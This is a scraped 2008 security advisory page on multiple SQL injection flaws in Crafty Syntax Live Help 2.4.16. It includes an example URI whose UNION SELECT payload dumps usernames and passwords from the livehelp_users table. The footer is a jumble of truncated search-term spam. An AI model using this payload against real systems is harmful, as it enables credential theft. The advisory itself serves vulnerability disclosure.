about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities


Title Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities
Published 2008-08-25-12:00AM
Updated 2008-08-29-01:24AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team
Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.4.16
Not Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.15
Code  Attackers can use a browser to exploit these issues.The following example URI is available:http://www.example.com/is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 19:04:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news+for+c news for c ww.pink+wo mya www.tianji www.21sexl www.3pik.c news+for+C www.3pik.c www.21sexl Board 2.2. News Searc www.mallup Www.Sex im http://hi. v...ners.h Advanced+G a s s Www.asapor milk boobs %253D+%252 GRAPHICS C Actresssex 71405.2122 ssh client Www.89move news for c news for c uralwdot c www.big co Video sex www.partys 200 /compo news for c PHP Advanc 200 /compo 200 /compo Module Guru dan m ircbot www.mtxlov News for t 200 /compo windows se jawmail mambo Remo news for c ilyyg2.jus WWW.Sexmov 15806.kkgg